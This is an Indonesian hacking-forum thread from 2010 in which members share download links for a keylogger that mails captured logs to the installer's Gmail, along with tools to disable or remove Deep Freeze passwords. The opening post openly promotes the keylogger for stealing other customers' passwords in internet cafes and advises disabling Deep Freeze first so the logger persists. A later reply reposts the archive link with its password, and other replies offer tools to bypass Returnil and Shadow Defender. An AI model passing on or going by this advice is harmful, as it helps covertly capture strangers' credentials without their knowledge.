X-code Professional

X-code Community

Facebook group

Instagram X-code

Twitter

X-code Blog

Panel
Welcome! Anonymous

[SHARE TOOLS] Keylogger dan anti deepfreez

[ { NUM_COMMENT }]

Tempat pembahasan dan tutorial penggunaan tools untuk hacking, security dan forensik komputer.

Moderators: Paman, Xshadow, indounderground

Forum rules
Tool yang diupload oleh member tidak diperiksa oleh kami, mungkin saja terinfeksi oleh malware secara disengaja ataupun tidak, saran kami sebaiknya mendownload tool tersebut dari sumber pembuatnya. Bagi yang buat thread diharapkan menampilkan screenshot tool.

[SHARE TOOLS] Keylogger dan anti deepfreez

Postby panji_cihui » Thu Feb 25, 2010 5:58 pm

:love: :love:

ada yang suka maen di warnet en suka ngambill pass gak nhe ?????????/ hmnnn ayooo ayoo ngaku ekekkekekeke
nah ini ada soft buat ambil pass cobain d


:tapa:
http://img689.imageshack.us/i/84233561.jpg/
http://img35.imageshack.us/i/28101033.jpg/

:D keylogger dikirim ke gmail..jd logs masuk nya k gmail kita
mangga d unduh :

http://hotfile.com/dl/30067965/5120622/RedFox-keylogger.rar.html

sebelum instal server nya MATIKAN DEEPFREEZ NYA GAN
biar kalo restart pc g ikut ilang juga xixixxixi

silakan d tester

http://www.4shared.com/file/229449479/f23e7db/DeepFreezPasswordRemove.html

http://www.4shared.com/file/229454387/a54631fb/anti_deep_freez.html

xixixixix selamat mencoba en good luck brooo :kaca: :kaca: :kaca: :kaca:
panji_cihui
 
Posts: 14
Joined: Wed Feb 17, 2010 9:34 pm

Re: Keylogger dan anti deepfreez

Postby Darkzzzz » Sun Feb 28, 2010 8:44 am

Thanks for share and berguna se x ;)
Di move dolo yach ke bag hacking tools :p
I'm not A Hacker, But I'm A Image
User avatar
Darkzzzz
 
Posts: 2206
Joined: Fri Jul 27, 2007 1:59 pm
Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.

Re: [SHARE TOOLS] Keylogger dan anti deepfreez

Postby phychole » Wed Mar 03, 2010 5:22 am

waw sedot dulu ah om...
[center]Saya belajar selama saya hidup
batu nisan akan menjadi ijazah saya
http://www.phychole.web.id
http://www.phychole.co.cc
[/center]
User avatar
phychole
 
Posts: 387
Joined: Tue Jun 09, 2009 8:59 pm
Location: Petahunan Sumbersuko Lumajang

Re: [SHARE TOOLS] Keylogger dan anti deepfreez

Postby suma093 » Tue Mar 09, 2010 9:04 pm

ada tool bwat matiin deeprez v6.61.20.2822 gak gan... gw da coba bbrapa tool gak bisa
suma093
 
Posts: 25
Joined: Tue Mar 09, 2010 12:00 pm

Re: [SHARE TOOLS] Keylogger dan anti deepfreez

Postby bedegar » Tue Mar 30, 2010 9:03 pm

thankssss
bedegar
 
Posts: 23
Joined: Tue Mar 30, 2010 8:07 pm
Location: palembang

Re: [SHARE TOOLS] Keylogger dan anti deepfreez

Postby hanjian_family » Tue Apr 06, 2010 4:38 am

suma093 wrote:ada tool bwat matiin deeprez v6.61.20.2822 gak gan... gw da coba bbrapa tool gak bisa



Ada....Yang Versi 6.62 juga ada, Mau hapus Pass Returnil or Shadow Defender juga ada.... :love:

"HaNJiaN"
....(¯`v´¯) ♥♥ I ℓ٥ﻻ ﻉ√٥υ=========http://thebigsecurity.com========= ♥♥ ..... •.¸.•´ ...¸.•
hanjian_family
 
Posts: 106
Joined: Mon May 28, 2007 1:19 pm
Location: AwaL KnowLedGe

Re: [SHARE TOOLS] Keylogger dan anti deepfreez

Postby 4r3k S1n4u » Tue Apr 06, 2010 6:54 am

mas panji linknya kok udah gk aktif ya pas aq mo donlod, diupload lagi dunkz please....
4r3k S1n4u
 
Posts: 2
Joined: Mon Mar 30, 2009 9:50 am

Re: [SHARE TOOLS] Keylogger dan anti deepfreez

Postby steventeen » Tue Apr 06, 2010 9:21 am

Postingannya detail donk oms...kasian teman2 Laen....

Nih unduh aja

http://rs539.rapidshare.com/files/350635102/Red_Fox_Keylogger.rar
pass : elite-soft


untuk account Premiumnya, Liat disini
http://forum.xcode.or.id/viewtopic.php?f=117&t=38474
Image
User avatar
steventeen
 
Posts: 135
Joined: Sun Jul 27, 2008 3:22 pm
Location: Minahasa Selatan

Re: [SHARE TOOLS] Keylogger dan anti deepfreez

Postby nesta » Tue Apr 06, 2010 9:44 am

Code: Select all
http://www.4shared.com/file/229449479/f23e7db/DeepFreezPasswordRemove.html

http://www.4shared.com/file/229454387/a54631fb/anti_deep_freez.html

gak bisa di unduh om....

kalo DFnya bisa..... upload lagi dunk gan...
imajinasi jauh lebih penting dari pada pengetahuan
User avatar
nesta
 
Posts: 555
Joined: Fri May 08, 2009 12:17 am

Re: [SHARE TOOLS] Keylogger dan anti deepfreez

Postby nob0dy- » Tue Apr 06, 2010 2:05 pm

Keyloggernya link error :mati:
░░░░░░░░░░░░░░░░░░░░░░░░
░░░ There is nobody perfect ░░░
░░░░░░░░░░░░░░░░░░░░░░░░
nob0dy-
 
Posts: 173
Joined: Mon Apr 05, 2010 3:50 pm
Location: 127.0.0.1

{ FACEBOOK_COMMENT }


Return to Tools For Hacking - Security & Computer Forensic

Who is online

Users browsing this forum: No registered users and 9 guests